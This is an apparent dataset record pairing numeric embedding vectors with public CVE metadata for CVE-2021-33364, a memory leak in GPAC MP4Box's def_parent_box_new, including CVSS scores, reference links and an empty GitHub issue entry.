-0.000662561331409961, -0.020236272364854813, -0.007956141605973244, -0.002812395105138421, -0.009246131405234337, -0.0021097466815263033, -0.014269166626036167, 0.007145393174141645, 0.026174550876021385, 0.02924458496272564, 0.0032790256664156914, -0.0014458340592682362, -0.016085242852568626, -0.013865593820810318, 0.007920107804238796, 0.0021746065467596054, -0.03217048570513725, -0.01824723742902279, -0.000735078239813447, 0.01935706101357937, 0.006558051332831383, -0.006705787498503923, -0.0031457026489079, 0.007963348180055618, -0.0023043262772262096, -0.036523301154375076, 0.006413917988538742, -0.005650013219565153, 0.0051311347633600235, 0.0008476821822114289, -0.007812008261680603, -0.005840989761054516, 0.004190666601061821, 0.02358015812933445, 0.013310682028532028, -0.019861526787281036, 0.005804956424981356, 0.02280183881521225, 0.015508710406720638, -0.0037474578712135553, 0.008229994215071201, 0.0006076106219552457, -0.024387301877141, -0.016431162133812904, -0.013289062306284904, -0.0031096693128347397, -0.005001415032893419, -0.016416747123003006, 0.001844902290031314, -0.007790388073772192, 0.04537306725978851, 0.0021421764977276325, -0.017022106796503067, 0.005671633407473564, 0.00259259226731956, 0.0003700164088513702, 0.0030862477142363787, 0.03156512603163719, 0.008114687167108059, 0.0056175836361944675, 0.012474710121750832, -0.00989472959190607, 0.0001842199853854254, 0.018665222451090813, 0.013029622845351696, -0.002134969923645258, 0.012813422828912735, -0.003981674090027809, 0.0034285634756088257, 0.0019872337579727173, 0.008979485370218754, -0.00030538177816197276, -0.009736184030771255, -0.014269166626036167, -0.0037294412031769753, 0.0030303962994366884, -0.009123618714511395, -0.006417521741241217, -0.0022358631249517202, -0.006417521741241217, 0.007754355203360319, -0.0012242295779287815, -0.00584819633513689, 0.008511053398251534, -0.03537023812532425, -0.009008311666548252, -0.004421279765665531, -0.006792267318814993, -0.007689495105296373, 0.0006413918454200029, -0.015580776147544384, -0.0024538643192499876, 0.01523485779762268, 0.02264329232275486, -0.014961004257202148, 0.005603170022368431, 0.020956937223672867, -0.0002745283127296716, 0.008669599890708923, -0.006633720826357603, -0.016387920826673508, 0.01664736121892929, -0.0023061279207468033, -0.012539570219814777, -0.0212163757532835, 0.00841736700385809, -0.015479883179068565, 0.005141944624483585, -0.02579980529844761, -0.0029565279837697744, 0.009260544553399086, 0.007228269707411528, 0.011811698786914349, -0.014031346887350082, 0.012085551396012306, -0.019054381176829338, 0.0012143204221501946, -0.01886700838804245, -0.006565257906913757, -0.03191104531288147, -0.01854991540312767, -0.014413299039006233, -0.009368645027279854, -0.024300822988152504, -0.021490229293704033, 0.00871283933520317, 0.011941418051719666, -0.005650013219565153, 0.009556017816066742, -0.019919179379940033, 0.005931072868406773, -0.0025907906237989664, 0.008511053398251534, -0.004605049267411232, -0.009217305108904839, -0.0002432244218653068, -0.007098549976944923, -0.021605536341667175, 0.005192391108721495, -0.011256786994636059, -0.012280130758881569, 0.004273543134331703, 0.016575293615460396, 0.02969139628112316, -0.011681979522109032, 0.005952692590653896, 0.011127066798508167, -0.026664603501558304, 0.0025259307585656643, -0.0227874256670475, -0.01169639267027378, 0.011292819865047932, 0.012856663204729557, 0.02467556856572628, -0.0027871718630194664, 0.002439450938254595, 0.019241753965616226, 0.014139446429908276, -0.025843046605587006, 0.005783336237072945, 0.004576222505420446, 0.0006823796429671347, -0.027111416682600975, -0.010572155006229877, 0.0009323603007942438, 0.010687461122870445, -0.006983243394643068, -0.0057220798917114735, 0.0028304115403443575, 0.0011062207631766796, 0.009721769951283932, -0.011501813307404518, -0.005909452680498362, -0.00989472959190607, -0.020221859216690063, -0.01115589402616024, -0.0031168758869171143, 0.014334025792777538, -0.005808559712022543, -0.010449642315506935, -0.0007301237201318145, 0.00785524770617485, 0.011948625557124615, -0.01759863831102848, -0.010435229167342186, 0.022902732715010643, -0.020092139020562172, 0.025742152705788612, 0.004932951647788286, 0.02878335863351822, 0.023032452911138535, 0.014370059594511986, -0.004511362873017788, 0.004284352995455265, -0.018333716318011284, 0.0004301469016354531, -0.003707821248099208, 0.00808586087077856, -0.0019872337579727173, -0.009606463834643364, -0.022744186222553253, 0.006835507228970528, -0.005905849393457174, -0.017324786633253098, -0.00920289196074009, -0.02313334494829178, -0.007206649519503117, -0.0009179469780065119, 0.016604119911789894, 0.012287337332963943, 0.022744186222553253, 0.01414665300399065, -0.012071138247847557, 0.009952383115887642, 0.001877332222647965, 0.004208683501929045, -0.004482536111027002, -0.0014485366409644485, 0.020034486427903175, -0.011689186096191406, 0.006370678078383207, 0.013901627622544765, 0.0021782098338007927, -0.000624726468231529, 0.011343266814947128, 0.005358144175261259, -0.015436643734574318, 0.0011044190032407641, 0.0012134196003898978, 0.002855635015293956, 0.020250685513019562, 0.014269166626036167, 0.0019169688457623124, -0.0188525952398777, -0.01810310408473015, -0.019371474161744118, -0.010464055463671684, 0.02058219164609909, 0.0028340150602161884, -0.018002210184931755, -0.0298643559217453, -0.0070661199279129505, 0.028033867478370667, -0.0021259617060422897, 0.019457954913377762, 0.013952073641121387, -0.024574674665927887, -0.03640799596905708, -0.02751498855650425, -0.023349544033408165, 0.0027313202153891325, -0.01729595847427845, 0.025021487846970558, -0.010579361580312252, 0.003338480368256569, -0.001927778823301196, -0.004064550623297691, -0.0018431006465107203, 0.0036717879120260477, 0.01052170805633068, -0.002700692042708397, -0.0006211231229826808, 0.00359431654214859, 0.010658634826540947, 0.010637015104293823, -0.009592050686478615, -0.017512159422039986, 0.02689521573483944, -0.011963038705289364, -0.014816871844232082, 0.011004554107785225, -0.02342161163687706, 0.013353921473026276, 0.0008900212123990059, 0.0026142122223973274, 0.007303939666599035, -0.011559465900063515, 0.00379069778136909, -0.004752785433083773, 0.009303784929215908, 0.010089309886097908, 0.011127066798508167, -0.011357679963111877, -0.004997811745852232, 0.020466884598135948, 0.012330577708780766, 0.0172815453261137, 0.019544433802366257, 0.006024759262800217, 0.003037602873519063, -0.00013546249829232693, 0.009613670408725739, 0.018290476873517036, -0.0033060505520552397, -0.013411574997007847, 0.014694358222186565, -0.015220443718135357, 0.00455820607021451, 0.0065003978088498116, -0.0009710960439406335, 0.018607569858431816, -0.007134583313018084, 0.012359404005110264, 0.0010665841400623322, 0.0020070518366992474, -0.0129791758954525, -0.0037510611582547426, -0.009945176541805267, -0.013317888602614403, -0.03268936276435852, 0.008237200789153576, -0.002313334494829178, -0.013707047328352928, -0.01382235437631607, 0.011999071575701237, 0.01343319471925497, 0.00128728779964149, 0.0007922810618765652, 0.0069724335335195065, -0.01517720427364111, 0.0055058803409338, -0.003999690525233746, 0.009880316443741322, 0.003678994718939066, 0.0017043726984411478, -0.0014061975525692105, 0.00565361650660634, 0.00887138582766056, -0.011429746635258198, 0.020798390731215477, -0.03335237503051758, 0.0049113319255411625, 0.004493345972150564, 0.004378039855509996, -0.0067274076864123344, 0.00770390871912241, -0.00341595197096467, 0.0007877768948674202, 0.006961623672395945, 0.010759527795016766, 0.01524927094578743, -0.021129896864295006, 0.009123618714511395, 0.0019530020654201508, -0.013613360933959484, 0.006586877629160881, 0.03081563487648964, -0.02218206785619259, 0.013238615356385708, 0.014254753477871418, -0.00000341330564879172, -0.01696445420384407, -0.01054332870990038, 0.0010467658285051584, 0.009094791486859322, -0.001319717732258141, 0.015465470030903816, 0.01178287249058485, -0.015350163914263248, -0.004601445980370045, 0.020985763520002365, 0.018578743562102318, 0.007696701679378748, -0.0009954185225069523, -0.019457954913377762, 0.018362542614340782, 0.022254133597016335, 0.005588756874203682, -0.006042775698006153, 0.008554292842745781, -0.003037602873519063, 0.008511053398251534, 0.004601445980370045, 0.004702338948845863, -0.004179856739938259, -0.006449951324611902, -0.011941418051719666, -0.020481297746300697, -0.00584819633513689, -0.0007679585833102465, -0.02261446602642536, 0.010759527795016766, 0.012316164560616016, 0.002462872536852956, 0.007984967902302742, -0.008835352025926113, 0.008770492859184742, 0.011761251837015152, -0.01682032085955143, -0.014989831484854221, -0.009873109869658947, 0.005487863905727863, 0.002288111252710223, -0.014110620133578777, 0.011256786994636059, -0.01217923779040575, -0.009217305108904839, 0.0023601776920259, 0.0035979198291897774, 0.006612101104110479, -0.00951277744024992, -0.00020538951503112912, 0.023623397573828697, 0.024891767650842667, 0.0275005754083395, -0.002419632626697421, 0.013180961832404137, -0.01423313282430172, -0.018449023365974426, -0.019688567146658897, -0.007210252806544304, 0.0015431238571181893, -0.00046212642337195575, -0.0020611018408089876, 0.0032285789493471384, 0.015133963897824287, 0.0032087608706206083, -0.01021182257682085, 0.02954726293683052, 0.0025997988414019346, 0.007145393174141645, -0.0007868760731071234, -0.009685737080872059, 0.008287646807730198, -0.023854009807109833, -0.010190202854573727, -0.016258202493190765, -0.005682443268597126, -0.011199133470654488, 0.04370112344622612, 0.009296578355133533, 0.019602086395025253, 0.01680590771138668, -0.011653152294456959, -0.005444623995572329, 0.000886868336237967, 0.020683083683252335, 0.003740251064300537, 0.015638429671525955, 0.0042050802148878574, -0.00010697370453272015, 0.02215324155986309, 0.006295008584856987, 0.00902993232011795, 0.008921831846237183, 0.013216995634138584, -0.021173136308789253, 0.005480656865984201, 0.009736184030771255, -0.00566442683339119, 0.011033380404114723, -0.006806680466979742, 0.0037798876874148846, 0.0052824742160737514, -0.009181271307170391, 0.002457467606291175, -0.003298843977972865, 0.013959280215203762, 0.030873287469148636, -0.0037474578712135553, -0.01870846189558506, -0.01777159795165062, 0.022830666974186897, -0.001235940377227962, -0.02169201523065567, 0.0051131178624928, -0.005430210381746292, 0.01810310408473015, 0.0012098163133487105, -0.004752785433083773, -0.011516226455569267, -0.010240648873150349, -0.020207446068525314, 0.0070877401158213615, 0.010334335267543793, 0.01446374598890543, -0.005974312778562307, -0.011984658427536488, 0.006608497817069292, -0.011033380404114723, -0.012150411494076252, 0.0059671057388186455, 0.0011755847372114658, 0.002008853480219841, -0.018117517232894897, -0.024156689643859863, -0.014499778859317303, 0.017411265522241592, 0.006929193623363972, -0.004360022954642773, 0.005163564346730709, -0.01699328050017357, -0.004367229528725147, -0.022715359926223755, -0.012215271592140198, 0.00754536222666502, 0.011941418051719666, 0.023176586255431175, -0.02735644206404686, 0.03289115056395531, 0.016085242852568626, 0.011739632114768028, 0.01069466769695282, -0.008302059955894947, -0.008597533218562603, -0.0007003962527960539, -0.021778495982289314, 0.03366946801543236, 0.0033907287288457155, 0.0014710574178025126, -0.015393403358757496, 0.0030105779878795147, -0.012013484723865986, -0.004547395743429661, -0.00920289196074009, -0.008093067444860935, -0.00032317318255081773, 0.0007472395082004368, 0.026635777205228806, 0.008143514394760132, 0.0037474578712135553, 0.005311300978064537, 0.02639075182378292, -0.024286409839987755, -0.006078809034079313, 0.006864333990961313, -0.00951277744024992, 0.0006756234215572476, 0.011703599244356155, -0.01093969400972128, -0.00002896735350077506, -0.006460761651396751, -0.006212132051587105, -0.0014395283069461584, 0.0025817821733653545, -0.010255062021315098, 0.01666177436709404, 0.024416128173470497, -0.004075360484421253, 0.0012557586887851357, -0.00043622750672511756, 0.0016692401841282845, 0.009930763393640518, -0.007120169699192047, -0.012186444364488125, 0.0009404677548445761, -0.01617172174155712, 0.017800424247980118, -0.004342006519436836, -0.013642188161611557, -0.017252719029784203, -0.025208860635757446, -0.001272874535061419, 0.01225130446255207, -0.014723185449838638, 0.012056725099682808, 0.024617915973067284, -0.016950039193034172, 0.023695463314652443, -0.015580776147544384, 0.016921212896704674, -0.03202635049819946, -0.015479883179068565, 0.008705632761120796, 0.006813887041062117, -0.003470001742243767, 0.007487709168344736, 0.008849766105413437, 0.0015530330128967762, -0.0031457026489079, -0.012640463188290596, 0.006986846681684256, 0.004594238940626383, -0.012777389958500862, -0.012835043482482433, -0.031997524201869965, -0.017858078703284264, -0.004262733273208141, -0.017108585685491562, -0.004824852105230093, -0.002106143394485116, -0.015263684093952179, 0.0032141658011823893, -0.01320978906005621, -0.00221784645691514, 0.005714873317629099, 0.02483411505818367, -0.009087584912776947, 0.002100738463923335, 0.004979794844985008, -0.0011485597351565957, -0.011220753192901611, 0.05453992635011673, 0.014312406070530415, 0.003992483951151371, 0.011400919407606125, -0.01156667247414589, -0.010485675185918808, 0.0075525688007473946, -0.014506985433399677, -0.017656290903687477, 0.0008364217937923968, 0.0007256195531226695, 0.006777854170650244, 0.02072632499039173, -0.013894420117139816, 0.0039024008437991142, -0.007487709168344736, 0.0002900676627177745, -0.006028362549841404, -0.0033637038432061672, -0.0314786471426487, -0.0090443454682827, -0.005959899164736271, -0.006467968225479126, -0.019602086395025253, -0.024416128173470497, 0.009138031862676144, -0.013584534637629986, -0.02497824840247631, -0.011429746635258198, -0.001736802514642477, 0.019112035632133484, -0.013649394735693932, -0.0094407107681036, -0.0006431934889405966, 0.012215271592140198, 0.006064395885914564, 0.009844283573329449, 0.01964532770216465, -0.011040586978197098, -0.01305124256759882, -0.01618613488972187, -0.018146343529224396, -0.011343266814947128, -0.0008724550134502351, -0.01653205417096615, 0.027587054297327995, -0.009390264749526978, 0.040011320263147354, 0.01602758839726448, 0.019097622483968735, 0.0019115637987852097, 0.008539879694581032, 0.005613979883491993, 0.013598947785794735, 0.007321956101804972, -0.0068210940808057785, 0.002639435464516282, -0.00802820734679699, -0.01383676752448082, -0.016560880467295647, 0.014182686805725098, 0.00574009632691741, -0.015465470030903816, -0.015105137601494789, -0.022369440644979477, -0.019212927669286728, 0.02294597215950489, 0.003693407867103815, 0.0056175836361944675, 0.02198028191924095, -0.011400919407606125, -0.0036483663134276867, -0.008475019596517086, -0.0094407107681036, -0.00218181312084198, -0.032487574964761734, -0.0009305586572736502, -0.010737908072769642, 0.006907573901116848, 0.004659099038690329, -0.003206958994269371, -0.021475816145539284, 0.026462817564606667, 0.0006229247665032744, 0.011833318509161472, -0.00261060893535614, -0.009635291062295437, -0.002401615958660841, 0.00613285880535841, -0.0013584534171968699, 0.015796976163983345, -0.004259129986166954, -0.016142895445227623, -0.03588911518454552, 0.01758422516286373, -0.007466088980436325, 0.006943606771528721, 0.0073651960119605064, 0.002706096973270178, 0.012373817153275013, 0.021158723160624504, 0.007001260295510292, -0.02637633867561817, -0.006370678078383207, -0.012135998345911503, -0.024589087814092636, 0.0157249104231596, -0.010413608513772488, -0.018506675958633423, -0.005873419344425201, -0.0015133963897824287, -0.0029979662504047155, -0.010831594467163086, -0.004140220116823912, 0.01820399798452854, 0.007264303043484688, 0.019400300458073616, -0.011472986079752445, 0.003291637171059847, 0.026981696486473083, -0.028567159548401833, -0.0016305044991895556, 0.01978945918381214, -0.013267441652715206, -0.014831284992396832, 0.010024449788033962, 0.0259295254945755, 0.009051552042365074, 0.01915527507662773, -0.00902993232011795, 0.006860730703920126, -0.004954571835696697, 0.013584534637629986, 0.008136307820677757, 0.008201166987419128, 0.019775046035647392, -0.001994440332055092, 0.012943143025040627, 0.0018358939560130239, 0.019414713606238365, 0.017050933092832565, 0.020553365349769592, -0.017368026077747345, -0.010276682674884796, -0.009130825288593769, 0.012114377692341805, -0.006212132051587105, -0.02796179987490177, -0.005170770920813084, 0.0018169765826314688, 0.005581550300121307, 0.010586568154394627, 0.0015971737448126078, -0.003787094494327903, 0.009728977456688881, 0.005304093938320875, 0.0017205876065418124, 0.02187938801944256, -0.013469228520989418, 0.01853550225496292, -0.02056777849793434, 0.017382439225912094, 0.004605049267411232, -0.027529401704669, 0.000020845796825597063, -0.00801379419863224, 0.03035440854728222, -0.001502586412243545, 0.006385091692209244, -0.0033781169913709164, -0.026044832542538643, -0.009188477881252766, -0.0010449641849845648, -0.005887832958251238, 0.010492881760001183, 0.005891436245292425, 0.012842250056564808, 0.009130825288593769, 0.019544433802366257, 0.012287337332963943, 0.01130723301321268, 0.006179702002555132, -0.021014589816331863, -0.004331196658313274, 0.02874011918902397, 0.00014266914513427764, 0.0013836767757311463, -0.014730392023921013, 0.0204524714499712, -0.0013647592859342694, 0.00695441709831357, -0.028077106922864914, -0.0016440169420093298, 0.0016386120114475489, -0.012208064086735249, 0.03525492921471596, 0.0029871563892811537, -0.004338403232395649, 0.011033380404114723, -0.011249580420553684, 0.01586904190480709, 0.0008346200920641422, 0.0026880803052335978, -0.01588345505297184 ]
179
CVE-2021-33364
2021-09-13T19:15:13.987000
Memory leak in the def_parent_box_new function in MP4Box in GPAC 1.0.1 allows attackers to read memory via a crafted file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/fe5155cf047252d1c4cb91602048bfa682af0ea7" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1783" }, { "source": "[email protected]", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:1.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "82DD2D40-0A05-48FD-940D-32B4D8B51AB3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/1783
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
null
[security]memory leak in MP4Box def_parent_box_new
https://api.github.com/repos/gpac/gpac/issues/1783/comments
0
2021-05-08T05:13:43
2023-09-22T06:07:11Z
https://github.com/gpac/gpac/issues/1783
880,295,889
1,783
true
This is a GitHub Issue repo:gpac owner:gpac Title : [security]memory leak in MP4Box def_parent_box_new Issue date: --- start body --- None --- end body ---
157
[ -0.03216094896197319, 0.030359704047441483, -0.0024331342428922653, 0.007662557065486908, 0.03901730477809906, 0.004415956791490316, -0.01561563741415739, 0.04322989657521248, -0.003980171866714954, 0.02174568362534046, 0.02600185200572014, 0.017954351380467415, 0.007114193867892027, -0.022777041420340538, 0.016298366710543633, 0.017605723813176155, -0.008185499347746372, -0.016792258247733116, 0.0007467361283488572, -0.045786499977111816, 0.03181232139468193, -0.04131244122982025, -0.012441668659448624, 0.02174568362534046, -0.02202168107032776, 0.008454233407974243, -0.008991701528429985, 0.01561563741415739, -0.003201205749064684, 0.03210284560918808, 0.006264412775635719, 0.027076788246631622, -0.02775951847434044, 0.013494815677404404, 0.04230022057890892, -0.006950774230062962, 0.044508196413517, 0.05055108666419983, 0.004539429675787687, -0.021861892193555832, -0.010560528375208378, -0.04433388262987137, -0.04985383152961731, -0.008911808021366596, 0.017765510827302933, 0.02003159373998642, 0.007698872592300177, -0.015339639969170094, -0.03930782899260521, 0.0030014708172529936, 0.029444554820656776, -0.03561817854642868, -0.014141230843961239, -0.053049590438604355, -0.010785683989524841, -0.0439562052488327, 0.035066183656454086, -0.007106930948793888, 0.008396129123866558, 0.04808163642883301, 0.02746899612247944, 0.04471156373620033, -0.015964265912771225, 0.03471755608916283, 0.005799575243145227, 0.012703139334917068, -0.0089335972443223, 0.02613258734345436, 0.0030759174842387438, 0.032538630068302155, -0.00008715704461792484, -0.026437636464834213, 0.005469104740768671, 0.030388757586479187, 0.02677173912525177, -0.03724510967731476, 0.059673525393009186, 0.020046120509505272, -0.012238302268087864, 0.018549924716353416, -0.046251337975263596, 0.05854048207402229, -0.012906505726277828, 0.013821654953062534, 0.004728269763290882, 0.008882755413651466, -0.03425271809101105, -0.06449621170759201, -0.0072412979789078236, -0.042154956609010696, 0.0041326964274048805, 0.03169611096382141, 0.009739800356328487, -0.003947488032281399, 0.03311967849731445, -0.011875147931277752, -0.027919307351112366, -0.008512338623404503, -0.031957585364580154, -0.0260744821280241, -0.0386686772108078, -0.027338260784745216, -0.014751330018043518, 0.0026746317744255066, 0.013233345001935959, 0.004626586567610502, 0.0369255356490612, -0.03134748339653015, -0.0010749369394034147, 0.11336226761341095, 0.031899478286504745, 0.007539084646850824, -0.030359704047441483, 0.02377934753894806, 0.01885497383773327, 0.041980642825365067, -0.031260326504707336, -0.026858896017074585, -0.04439198970794678, -0.006623935420066118, 0.0020282170735299587, -0.00796760618686676, -0.024679969996213913, -0.002278793603181839, -0.008541390299797058, 0.0375065803527832, -0.011373994871973991, 0.0013191582402214408, -0.046658072620630264, 0.004092749673873186, -0.04195159301161766, 0.00785139761865139, 0.010175584815442562, -0.03614112362265587, 0.0021643999498337507, 0.004227116703987122, 0.0011085286969318986, 0.024883337318897247, -0.010727579705417156, 0.03105696104466915, -0.050115302205085754, -0.031376536935567856, 0.03088264726102352, -0.03227715939283371, -0.003377335611730814, -0.006649356335401535, 0.010487898252904415, 0.016676047816872597, -0.04514734819531441, 0.018419189378619194, 0.01417754590511322, -0.015891633927822113, 0.01939244195818901, 0.02852940559387207, 0.050347719341516495, -0.01303724106401205, -0.0009877798147499561, 0.04552502930164337, -0.014867539517581463, 0.008250867016613483, -0.015267008915543556, -0.03233526274561882, 0.010502424091100693, 0.0013981442898511887, -0.01891307905316353, -0.035472918301820755, 0.03407840430736542, 0.026786265894770622, -0.002267898991703987, 0.01367639284580946, 0.011896937154233456, -0.009267698973417282, 0.03474660962820053, 0.043549470603466034, -0.023459771648049355, -0.02489786222577095, 0.0047863745130598545, 0.021426107734441757, -0.03332304581999779, -0.03239336982369423, -0.005360158160328865, 0.029386451467871666, -0.011039892211556435, -0.007924027740955353, -0.011148839257657528, -0.017155412584543228, 0.03744847699999809, -0.025798486545681953, 0.023503350093960762, -0.04540882259607315, 0.006881774868816137, 0.007284876424819231, 0.007575399708002806, -0.00799665879458189, 0.04006318747997284, -0.0167051013559103, -0.025057651102542877, -0.004325168207287788, -0.004259800538420677, -0.003197574056684971, 0.019537704065442085, -0.02764330990612507, 0.011882410384714603, -0.00926043651998043, -0.04200969636440277, 0.0035734388511627913, -0.027134893462061882, 0.0368964821100235, -0.0019737440161406994, -0.014250176958739758, -0.027309207245707512, 0.006039257161319256, 0.015020064078271389, 0.009180542081594467, -0.008003922179341316, 0.008715705014765263, -0.00779329240322113, -0.013211555778980255, -0.005004267208278179, -0.021774735301733017, 0.03712890297174454, 0.010262742638587952, 0.031086012721061707, -0.016835836693644524, 0.0015134457498788834, -0.017780037596821785, -0.020234961062669754, 0.01698109693825245, -0.021164635196328163, 0.017155412584543228, 0.02648121491074562, 0.008512338623404503, 0.024287763983011246, 0.005342000629752874, -0.005868574604392052, 0.0056034717708826065, -0.012310932390391827, -0.011090734042227268, 0.005207633599638939, 0.007019773591309786, 0.0038748569786548615, 0.046541862189769745, -0.016559839248657227, -0.02184736542403698, -0.0014853012980893254, 0.07826703041791916, -0.029676973819732666, -0.010589580982923508, -0.028718246147036552, 0.032364316284656525, 0.022065259516239166, -0.012325459159910679, -0.021484211087226868, -0.010117480531334877, -0.004633849486708641, 0.003907540813088417, 0.022413887083530426, 0.025682276114821434, -0.022515570744872093, -0.04212590679526329, -0.035705335438251495, -0.024825232103466988, -0.014932907186448574, -0.006442358251661062, 0.0018230348359793425, -0.032248105853796005, -0.003282915335148573, 0.01828845404088497, 0.008969912305474281, 0.0006886314367875457, -0.00169139145873487, -0.017474988475441933, -0.01682130992412567, -0.03277105093002319, -0.0007222232525236905, -0.0043324315920472145, -0.0005556261749006808, -0.002318740589544177, 0.007223139982670546, 0.010001271031796932, -0.005189475603401661, 0.0013382238103076816, -0.011519256047904491, 0.02980770915746689, 0.00739382253959775, 0.006013836245983839, -0.0021898208651691675, 0.010284531861543655, 0.018608029931783676, 0.020351169630885124, 0.0034499664325267076, 0.050638243556022644, -0.01709730736911297, 0.02799193747341633, 0.02746899612247944, -0.005919415969401598, -0.005323843099176884, 0.007953080348670483, -0.018593503162264824, 0.011584623716771603, -0.025275543332099915, 0.021309897303581238, -0.016908466815948486, -0.016356471925973892, -0.016501734033226967, 0.04078949615359306, -0.03227715939283371, 0.03901730477809906, 0.014119441621005535, 0.020830534398555756, 0.01693751849234104, -0.05171317979693413, -0.009354855865240097, -0.0015225246315822005, -0.0187532901763916, 0.003248415654525161, -0.012049461714923382, -0.02420060709118843, -0.019000235944986343, 0.02062716707587242, -0.010524213314056396, 0.028020991012454033, -0.023358087986707687, 0.010357161983847618, 0.027033209800720215, -0.009892324917018414, -0.027570679783821106, 0.03157990425825119, -0.05049298331141472, 0.024229658767580986, -0.007473716512322426, -0.016370998695492744, 0.01651626080274582, -0.027919307351112366, 0.009245909750461578, -0.04404336214065552, 0.0002548889606259763, 0.017329726368188858, 0.023648612201213837, -0.018346557393670082, 0.004931636154651642, -0.006409674417227507, 0.041980642825365067, -0.006725618615746498, -0.01968296617269516, -0.02302398718893528, -0.011214206926524639, 0.002807183191180229, 0.002238846616819501, 0.0005283895879983902, 0.0008674849523231387, 0.006217202637344599, 0.019784649834036827, 0.04029560834169388, 0.042213063687086105, 0.0380585752427578, -0.0028489460237324238, -0.009267698973417282, 0.0169956237077713, -0.011039892211556435, 0.020598115399479866, -0.01898570917546749, 0.020133277401328087, 0.016269315034151077, 0.005941205192357302, 0.008853702805936337, -0.02232673019170761, -0.01544132363051176, -0.022922303527593613, -0.007582663092762232, 0.00433606281876564, 0.03157990425825119, -0.045031141489744186, 0.043200843036174774, 0.02396818809211254, -0.01077842153608799, 0.028965191915631294, 0.03704174607992172, -0.018666133284568787, 0.007771503180265427, -0.03837815299630165, 0.002743631135672331, 0.028660142794251442, -0.04726817086338997, -0.004524903371930122, -0.006863617338240147, -0.007916765287518501, 0.04093476012349129, -0.006656619254499674, -0.02174568362534046, -0.057610806077718735, 0.013356816954910755, -0.00802571140229702, -0.049882881343364716, -0.023241879418492317, 0.049127522855997086, -0.04346231371164322, -0.021571367979049683, -0.0056071034632623196, -0.04049897566437721, 0.04137054458260536, -0.02389555610716343, 0.0017004703404381871, 0.0026637371629476547, -0.005868574604392052, 0.04488587751984596, -0.0002596553531475365, -0.0068127759732306, 0.00175403559114784, 0.0024985019117593765, 0.04137054458260536, -0.024229658767580986, -0.029575290158391, 0.0427650585770607, 0.022922303527593613, 0.018201297149062157, 0.003548018168658018, 0.029081400483846664, -0.01775098592042923, 0.07361865043640137, -0.01850634627044201, -0.01101084053516388, 0.012899243272840977, 0.007012510672211647, 0.040324658155441284, 0.006729250308126211, 0.014133967459201813, -0.008032974787056446, 0.052294228225946426, -0.03625733032822609, -0.01148294098675251, -0.016124052926898003, -0.02178926207125187, -0.023677663877606392, 0.027309207245707512, -0.04482777416706085, -0.06612314283847809, -0.046251337975263596, -0.01461333129554987, -0.016501734033226967, -0.010836525820195675, 0.03277105093002319, 0.015267008915543556, 0.023227352648973465, 0.05543188005685806, -0.03192853182554245, -0.0029524448327720165, -0.007350244093686342, 0.029720552265644073, -0.01705372892320156, 0.008178235962986946, 0.007938554510474205, 0.005494525656104088, -0.015078169293701649, -0.01212935522198677, 0.0089335972443223, 0.007172298617660999, -0.003871225519105792, 0.01674867980182171, 0.01599331758916378, -0.0190292876213789, 0.010437056422233582, -0.0035570969339460135, 0.00461569195613265, 0.030592123046517372, 0.00860675796866417, -0.02161494828760624, -0.008178235962986946, 0.010996313765645027, -0.026103535667061806, 0.021004848182201385, 0.024447550997138023, -0.0056034717708826065, 0.0007022497593425214, -0.009972218424081802, 0.017373304814100266, 0.006340675055980682, -0.01904381439089775, 0.004310642369091511, -0.04459535703063011, -0.011875147931277752, -0.007706135511398315, -0.0202059093862772, 0.017155412584543228, -0.02436039410531521, -0.0005583498277701437, -0.01616763137280941, -0.005806838162243366, -0.0054255262948572636, -0.008083815686404705, 0.02437492087483406, -0.0014480779645964503, 0.0003005102335009724, -0.01297187339514494, 0.02736731246113777, -0.017896246165037155, -0.00275271013379097, -0.011570097878575325, 0.03832004964351654, 0.00046983096399344504, 0.023241879418492317, -0.0374775305390358, 0.02379387430846691, 0.0038494362961500883, 0.046599965542554855, -0.033061571419239044, -0.025057651102542877, 0.009521907195448875, -0.011577361263334751, -0.002324187895283103, -0.03140559047460556, -0.012666824273765087, -0.018433716148138046, -0.042329270392656326, -0.022225046530365944, -0.04148675501346588, 0.010698527097702026, 0.016676047816872597, 0.012870190665125847, 0.013371343724429607, -0.026786265894770622, -0.010487898252904415, -0.020002542063593864, 0.0037550160195678473, -0.004532166291028261, 0.03070833347737789, 0.005120476242154837, 0.018375610932707787, 0.031434640288352966, -0.010328110307455063, 0.0016986544942483306, -0.012753981165587902, -0.025115756317973137, 0.015208904631435871, -0.01292103249579668, -0.0032338895834982395, 0.015179852023720741, 0.0169956237077713, -0.019479600712656975, 0.014867539517581463, -0.02572585456073284, 0.03843625634908676, -0.010240952484309673, 0.03843625634908676, -0.006409674417227507, 0.03140559047460556, 0.014620594680309296, 0.020293066278100014, 0.0019628494046628475, -0.02219599485397339, -0.013342291116714478, -0.016327420249581337, 0.0008447878062725067, 